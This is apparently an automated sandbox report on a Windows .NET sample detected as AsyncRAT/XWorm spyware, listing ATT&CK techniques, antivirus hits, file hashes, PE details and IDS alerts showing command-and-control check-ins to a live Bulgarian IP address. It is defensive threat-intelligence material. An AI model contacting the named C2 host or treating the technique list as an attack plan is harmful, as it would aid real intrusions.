            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            Input Capture            		221
            Security Software Discovery            		Remote Services1
            Input Capture            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts232
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol11
            Archive Collected Data            		1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            Deobfuscate/Decode Files or Information            		Security Account Manager232
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Software Packing            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets13
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
            17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe100%AviraTR/Spy.Gen
            17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            87.120.116.1790%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s-part-0017.t-0009.fb-t-msedge.net
            		13.107.253.45
            		truefalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              87.120.116.179true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe, 00000000.00000002.3782866147.00000000026A1000.00000004.00000800.00020000.00000000.sdmpfalse
                		high

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                87.120.116.179
                		unknownBulgaria
                		25206UNACS-AS-BG8000BurgasBGtrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1586002
                Start date and time:2025-01-08 16:00:03 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 6m 14s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@1/0@0/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 5
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded IPs from analysis (whitelisted): 13.107.253.45, 20.109.210.53
                • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • VT rate limit hit for: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                10:01:00API Interceptor14350544x Sleep call for process: 17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                87.120.116.17917363364631bc7418009f735fbf6670730f0df5be418dd7fb7bf7e79b36349f3b17d812142896.dat-decoded.exeGet hashmaliciousXWormBrowse
                  173349054689897a42ce4a1face346760a1e1ea6ee459f1c43651627f7c7690c5adf7c1298500.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                    173347741090e23c9ebd2c4b604c71623763cbce99aec650e3f9e27d35f4f3dcf6f1064415652.dat-decoded.exeGet hashmaliciousXWormBrowse
                      1733477410ba2e5b8e1739578ed6933c4e69d66a81049f523c11599f36b2f5da870a31538a881.dat-decoded.exeGet hashmaliciousXWormBrowse
                        17334774117b7343420a7b9efab7c5b1abd0627c7af1c91f9947163684497ce841bf5f9198533.dat-decoded.exeGet hashmaliciousXWormBrowse
                          17334769266ba75a70859e94894e9fae5c33bba300e2b004c1166d236dc1ab2c8ff5669916631.dat-decoded.exeGet hashmaliciousXWormBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-part-0017.t-0009.fb-t-msedge.nethttps://www.dollartip.info/unsubscribe/?d=mdlandrec.netGet hashmaliciousUnknownBrowse
                            • 13.107.253.45
                            invoice-1623385214.pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                            • 13.107.253.45
                            invoice-1623385214 pdf.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYS, zgRATBrowse
                            • 13.107.253.45
                            https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                            • 13.107.253.45
                            https://rfqdocu.construction-org.com/Q5kL4/Get hashmaliciousHTMLPhisherBrowse
                            • 13.107.253.45
                            file.exeGet hashmaliciousXRedBrowse
                            • 13.107.253.45
                            valyzt.msiGet hashmaliciousXRedBrowse
                            • 13.107.253.45
                            LWQDFZ.exeGet hashmaliciousLodaRAT, XRedBrowse
                            • 13.107.253.45
                            Salary Amendment.xlsxGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.253.45
                            IcisR4FC8n.dllGet hashmaliciousUnknownBrowse
                            • 13.107.253.45

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            UNACS-AS-BG8000BurgasBG17363364631bc7418009f735fbf6670730f0df5be418dd7fb7bf7e79b36349f3b17d812142896.dat-decoded.exeGet hashmaliciousXWormBrowse
                            • 87.120.116.179
                            Inquiry List.docGet hashmaliciousDarkVision RatBrowse
                            • 87.120.113.91
                            3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
                            • 87.120.126.5
                            XClient.exeGet hashmaliciousXWormBrowse
                            • 87.120.125.47
                            file.exeGet hashmaliciousDcRat, JasonRATBrowse
                            • 87.120.113.91
                            009274965.lnkGet hashmaliciousDarkVision RatBrowse
                            • 87.120.113.91
                            hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                            • 87.120.115.216
                            rebirth.arm4t.elfGet hashmaliciousGafgytBrowse
                            • 87.120.113.63
                            rebirth.spc.elfGet hashmaliciousGafgytBrowse
                            • 87.120.113.63
                            rebirth.sh4.elfGet hashmaliciousGafgytBrowse
                            • 87.120.113.63

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.607994918660752
                            TrID:
                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            • Win32 Executable (generic) a (10002005/4) 49.75%
                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                            • Windows Screen Saver (13104/52) 0.07%
                            • Generic Win/DOS Executable (2004/3) 0.01%
                            File name:17363482243fcf48f1d103ef5a4702c871424ad69b9eb7d3f5e5957f5c4810f2a51fea8e76776.dat-decoded.exe
                            File size:36'864 bytes
                            MD5:5ab0db61a062d4ac36716b51c5ddac3a
                            SHA1:ad625cd275fafd23bbfbcf81a187031724bdef02
                            SHA256:929781941202c78878fbbf8e872f8559cdbd074c4e37f9dfcc8164422fbf9ddc
                            SHA512:9d3ece3454121801d05d67563405dc9a92d32d8e3b75e82829bc13a1de4d3b4ad8afc258de56090729361b2e6ee17b36a73ec67e6d96b5692d8db71fc72bb60b
                            SSDEEP:768:LL13A5Uno9RfHWa2BbUeo8icH1bxbFb9EsOMhzQXvjp:PxA5Uno9JHWXAeNicH1bBFb9EsOM16jp
                            TLSH:FBF24B48BBA04217D9ED6BF5A97372020674D613D917EB4E4CD48ADB6F27BC08D013EA
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,n~g................................. ........@.. ....................................@................................

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0x40a5de
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0x677E6E2C [Wed Jan 8 12:23:08 2025 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                            Entrypoint Preview

                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0xa58c0x4f.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x4c8.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xe0000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x85e40x860090a7123ee3386d8c6ce9e90f124574aaFalse0.4988339552238806data5.745280910175581IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xc0000x4c80x600b467910afb739ea2a2cc0ff880f6cac4False0.3723958333333333data3.679474816939037IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0xe0000xc0x2000a3a083968c42d8366b2de0e8564a094False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0xc0a00x234data0.4734042553191489
                            RT_MANIFEST0xc2d80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                            Imports

                            DLLImport
                            mscoree.dll_CorExeMain

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-01-08T16:01:12.903932+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:01:13.077801+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:13.127851+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:01:16.242604+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:16.242604+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:24.618805+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:24.620770+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:01:36.166777+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:36.170007+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:01:46.243779+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:46.243779+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:47.713242+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:47.714831+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:01:59.244040+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:01:59.246666+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:09.782194+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:09.784371+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:10.353231+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:10.362630+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:13.370500+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:13.374062+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:15.489399+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:15.497763+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:16.258225+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:16.258225+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:17.034068+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:17.035854+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:28.556337+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:28.557879+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:34.587963+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:34.590606+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:36.254498+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:36.258427+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:42.464649+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:42.466617+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:44.616880+01002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:44.860550+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:44.862387+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:44.908106+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:44.909886+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:44.955792+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:44.957595+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:45.050926+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:45.052851+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:45.375712+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:45.382678+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:02:46.232947+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:46.232947+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:54.884571+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:02:54.888266+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:03.197868+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:03.199865+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:03.293292+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:03.295087+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:13.388453+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:13.395074+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:15.841576+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:15.845023+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:16.234270+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:16.234270+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:18.732296+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:18.750360+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:30.215641+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:30.297465+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:31.244627+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:31.246525+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:31.333076+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:31.334683+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:31.441862+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:31.446747+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:42.863753+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:42.865670+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:43.908475+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:43.910630+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:46.241774+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:46.241774+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:51.681589+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:51.683612+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:03:51.770206+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
                            2025-01-08T16:03:51.771932+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.94975787.120.116.1791300TCP
                            2025-01-08T16:04:02.015912+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes187.120.116.1791300192.168.2.949757TCP
